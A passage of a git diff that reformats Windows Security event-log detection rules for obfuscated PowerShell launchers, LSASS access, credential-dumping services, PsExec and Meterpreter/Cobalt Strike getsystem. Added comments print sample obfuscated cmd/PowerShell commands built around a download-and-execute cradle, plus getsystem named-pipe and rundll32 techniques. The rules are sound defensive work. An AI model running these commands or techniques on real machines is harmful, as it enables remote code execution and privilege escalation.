- to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml index 5418eab21..fe824b65d 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml @@ -1,11 +1,10 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - Security id: fd0f5778-d3cb-4c9a-9695-66759d04702a related: - - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 - type: derived + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the code block linked in the references +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community @@ -17,21 +16,20 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection_eid: EventID: 4697 selection_servicefilename: - - ServiceFileName|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ServiceFileName|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ServiceFileName|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ServiceFileName|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ServiceFileName|re: \\*mdr\*\W\s*\)\.Name - - ServiceFileName|re: \$VerbosePreference\.ToString\( - - ServiceFileName|re: \String\]\s*\$VerbosePreference + - ServiceFileName|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ServiceFileName|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ServiceFileName|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ServiceFileName|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ServiceFileName|re: \\*mdr\*\W\s*\)\.Name + - ServiceFileName|re: \$VerbosePreference\.ToString\( + - ServiceFileName|re: \String\]\s*\$VerbosePreference condition: security and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml index 4e0a6dd3e..d1da151de 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation STDIN+ Launcher - Security id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 related: - - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml index 03003b9a3..9657ce53b 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR+ Launcher - Security id: dcf2db1f-f091-425b-a821-c05875b8925a related: - - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 - type: derived + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -18,13 +18,15 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection: EventID: 4697 + # ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " ServiceFileName|contains|all: - cmd - '"set' diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml index 1eb22339a..16ac2e3b9 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION - Security id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 related: - - id: 175997c5-803c-4b08-8bb0-70b099f47595 - type: derived + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml index 754c5b9f4..eeb1cc507 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER - Security id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca related: - - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 - type: derived + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml index edbba4618..aec0fd797 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Stdin - Security id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 related: - - id: 487c7524-f892-4054-b263-8a0ace63fc25 - type: derived + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml index 252bacf2d..49dbacfd1 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Clip - Security id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 related: - - id: 63e3365d-4824-42d8-8b82-e56810fefa0c - type: derived + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml index 71c076220..df3d8c668 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use MSHTA - Security id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a related: - - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 - type: derived + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml index da1b65c9f..6fb6e0f97 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Rundll32 - Security id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a related: - - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b - type: derived + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived status: test description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml index cec77269b..703aaa6b3 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 related: - - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 - type: derived + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/29 @@ -18,13 +18,15 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection: EventID: 4697 + # ServiceFileName|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" ServiceFileName|contains|all: - '&&set' - cmd diff --git a/sigma/builtin/security/win_security_iso_mount.yml b/sigma/builtin/security/win_security_iso_mount.yml index 0b3b59cd2..011cfefef 100644 --- a/sigma/builtin/security/win_security_iso_mount.yml +++ b/sigma/builtin/security/win_security_iso_mount.yml @@ -16,8 +16,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Removable - Storage" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Removable Storage" must be configured for Success/Failure detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_lm_namedpipe.yml b/sigma/builtin/security/win_security_lm_namedpipe.yml index 536ff5caa..7a224cd03 100644 --- a/sigma/builtin/security/win_security_lm_namedpipe.yml +++ b/sigma/builtin/security/win_security_lm_namedpipe.yml @@ -1,9 +1,7 @@ title: First Time Seen Remote Named Pipe id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad status: test -description: This detection excludes known namped pipes accessible remotely and notify - on newly observed ones, may help to detect lateral movement and remote exec using - named pipes +description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes references: - https://twitter.com/menasec1/status/1104489274387451904 author: Samir Bousseaden @@ -15,14 +13,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection1: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ false_positives: RelativeTargetName: - atsvc @@ -47,7 +44,6 @@ detection: - eventlog condition: security and (selection1 and not false_positives) falsepositives: - - Update the excluded named pipe to filter out any newly observed legit named - pipe + - Update the excluded named pipe to filter out any newly observed legit named pipe level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_lsass_access_non_system_account.yml b/sigma/builtin/security/win_security_lsass_access_non_system_account.yml index a4db591c0..a9f693446 100644 --- a/sigma/builtin/security/win_security_lsass_access_non_system_account.yml +++ b/sigma/builtin/security/win_security_lsass_access_non_system_account.yml @@ -1,8 +1,7 @@ title: LSASS Access From Non System Account id: 962fe167-e48d-4fd6-9974-11e5b9a5d6d1 status: test -description: Detects potential mimikatz-like tools accessing LSASS from non system - account +description: Detects potential mimikatz-like tools accessing LSASS from non system account references: - https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -23,28 +22,30 @@ detection: - 4656 AccessMask: - '0x100000' - - '0x1010' + - '0x1010' # car.2019-04-004 - '0x1400' - - '0x1410' - - '0x1418' - - '0x1438' - - '0x143a' + - '0x1410' # car.2019-04-004 + - '0x1418' # car.2019-04-004 + - '0x1438' # car.2019-04-004 + - '0x143a' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' - '0x1f3fff' - '0x40' - - 143a + - 143a # car.2019-04-004 - 1f0fff - 1f1fff - 1f2fff - 1f3fff + # - '0x1000' # minimum access requirements to query basic info from service ObjectType: Process ObjectName|endswith: \lsass.exe filter_main_service_account: SubjectUserName|endswith: $ filter_main_generic: ProcessName|contains: + # Legitimate AV and EDR solutions - :\Program Files\ - :\Program Files (x86)\ filter_main_wmiprvse: diff --git a/sigma/builtin/security/win_security_mal_creddumper.yml b/sigma/builtin/security/win_security_mal_creddumper.yml index 351947c21..ebc659496 100644 --- a/sigma/builtin/security/win_security_mal_creddumper.yml +++ b/sigma/builtin/security/win_security_mal_creddumper.yml @@ -1,15 +1,13 @@ title: Credential Dumping Tools Service Execution - Security id: f0d1feba-4344-4ca9-8121-a6c97bd6df52 related: - - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed - type: derived + - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed + type: derived status: test -description: Detects well-known credential dumping tools execution via service execution - events +description: Detects well-known credential dumping tools execution via service execution events references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment -author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, - oscd.community +author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community date: 2017/03/05 modified: 2022/11/29 tags: @@ -25,8 +23,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_mal_service_installs.yml b/sigma/builtin/security/win_security_mal_service_installs.yml index f8faf560e..bd97078f3 100644 --- a/sigma/builtin/security/win_security_mal_service_installs.yml +++ b/sigma/builtin/security/win_security_mal_service_installs.yml @@ -1,11 +1,10 @@ title: Malicious Service Installations id: cb062102-587e-4414-8efa-dbe3c7bf19c6 related: - - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a - type: derived + - id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a + type: derived status: test -description: Detects known malicious service installs that only appear in cases of - lateral movement, credential dumping, and other suspicious activities. +description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. references: - https://awakesecurity.com/blog/threat-hunting-for-paexec/ - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html @@ -23,8 +22,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_mal_wceaux_dll.yml b/sigma/builtin/security/win_security_mal_wceaux_dll.yml index 8942cf4cd..cb945c3d1 100644 --- a/sigma/builtin/security/win_security_mal_wceaux_dll.yml +++ b/sigma/builtin/security/win_security_mal_wceaux_dll.yml @@ -1,8 +1,7 @@ title: WCE wceaux.dll Access id: 1de68c67-af5c-4097-9c85-fe5578e09e67 status: test -description: Detects wceaux.dll access while WCE pass-the-hash remote command execution - on source host +description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host references: - https://www.jpcert.or.jp/english/pub/sr/ir_research.html - https://jpcertcc.github.io/ToolAnalysisResultSheet diff --git a/sigma/builtin/security/win_security_metasploit_authentication.yml b/sigma/builtin/security/win_security_metasploit_authentication.yml index 168c29381..a9fd4ea8b 100644 --- a/sigma/builtin/security/win_security_metasploit_authentication.yml +++ b/sigma/builtin/security/win_security_metasploit_authentication.yml @@ -24,7 +24,7 @@ detection: AuthenticationPackageName: NTLM WorkstationName|re: ^[A-Za-z0-9]{16}$ selection2: - ProcessName: null + ProcessName: EventID: 4776 Workstation|re: ^[A-Za-z0-9]{16}$ condition: security and (1 of selection*) diff --git a/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml b/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml index 4d0b40ff2..35a81e9da 100644 --- a/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml +++ b/sigma/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml @@ -1,11 +1,10 @@ title: Metasploit Or Impacket Service Installation Via SMB PsExec id: 6fb63b40-e02a-403e-9ffd-3bcc1d749442 related: - - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 - type: derived + - id: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0 + type: derived status: test -description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and - Impacket psexec.py by triggering on specific service installation +description: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -20,8 +19,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security @@ -29,7 +27,7 @@ detection: EventID: 4697 ServiceFileName|re: ^%systemroot%\\[a-zA-Z]{8}\.exe$ ServiceName|re: (^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$) - ServiceStartType: 3 + ServiceStartType: 3 # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697 ServiceType: '0x10' filter: ServiceName: PSEXESVC @@ -41,7 +39,6 @@ fields: - ServiceName - ServiceFileName falsepositives: - - Possible, different agents with a 8 character binary and a 4, 8 or 16 character - service name + - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml b/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml index f5aec11a9..7114f6b51 100644 --- a/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml +++ b/sigma/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml @@ -1,11 +1,10 @@ title: Meterpreter or Cobalt Strike Getsystem Service Installation - Security id: ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34 related: - - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 - type: derived + - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6 + type: derived status: test -description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting - a specific service installation +description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ @@ -19,14 +18,16 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection_eid: EventID: 4697 selection_cli_cmd: + # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a + # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\.\pipe\5e120a ServiceFileName|contains|all: - /c - echo @@ -35,12 +36,13 @@ detection: - cmd - '%COMSPEC%' selection_cli_rundll: + # meterpreter getsystem technique 2: rundll32.exe C:\Users\test\AppData\Local\Temp\tmexsn.dll,a /p:tmexsn ServiceFileName|contains|all: - rundll32 - .dll,a - '/p:' selection_cli_share: - ServiceFileName|startswith: \\\\127.0.0.1\\ADMIN$\ + ServiceFileName|startswith: \\\\127.0.0.1\\ADMIN$\ # https://twitter.com/svch0st/status/1413688851877416960?lang=en condition: security and (selection_eid and 1 of selection_cli_*) falsepositives: - Unlikely diff --git a/sigma/builtin/security/win_security_net_ntlm_downgrade.yml b/sigma/builtin/security/win_security_net_ntlm_downgrade.yml index ad2bb9165..c07dcfa94 100644 --- a/sigma/builtin/security/win_security_net_ntlm_downgrade.yml +++ b/sigma/builtin/security/win_security_net_ntlm_downgrade.yml @@ -1,8 +1,8 @@ title: NetNTLM Downgrade Attack id: d3abac66-f11c-4ed0-8acb-50cc29c97eed related: - - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 - type: derived + - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 + type: derived status: test description: Detects NetNTLM downgrade attack references: @@ -14,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1562.001 - attack.t1112 +# Windows Security Eventlog: Process Creation with Full Command Line logsource: product: windows service: security diff --git a/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml b/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml index 13fd4698c..63bb5ec18 100644 --- a/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml +++ b/sigma/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml @@ -1,9 +1,7 @@ title: Windows Network Access Suspicious desktop.ini Action id: 35bc7e28-ee6b-492f-ab04-da58fcf6402e status: test -description: Detects unusual processes accessing desktop.ini remotely over network - share, which can be leveraged to alter how Explorer displays a folder's content - (i.e. renaming files) without changing them on disk. +description: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. references: - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ author: Tim Shelton (HAWK.IO) diff --git a/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml b/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml index 4dfacad32..8aa36b721 100644 --- a/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml +++ b/sigma/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml @@ -15,10 +15,10 @@ detection: security: Channel: Security selection1: - EventID: 4720 + EventID: 4720 # create user SamAccountName|contains: $ selection2: - EventID: 4781 + EventID: 4781 # rename user NewTargetUserName|contains: $ condition: security and (1 of selection*) fields: diff --git a/sigma/builtin/security/win_security_not_allowed_rdp_access.yml b/sigma/builtin/security/win_security_not_allowed_rdp_access.yml index a10904d33..6f7b294cd 100644 --- a/sigma/builtin/security/win_security_not_allowed_rdp_access.yml +++ b/sigma/builtin/security/win_security_not_allowed_rdp_access.yml @@ -1,13 +1,9 @@ title: Denied Access To Remote Desktop id: 8e5c03fa-b7f0-11ea-b242-07e0576828d9 status: test -description: 'This event is generated when an authenticated user who is not allowed - to log on remotely attempts to connect to this computer through Remote Desktop. - - Often, this event can be generated by attackers when searching for available windows - servers in the network. - - ' +description: | + This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. + Often, this event can be generated by attackers when searching for available windows servers in the network. references: - 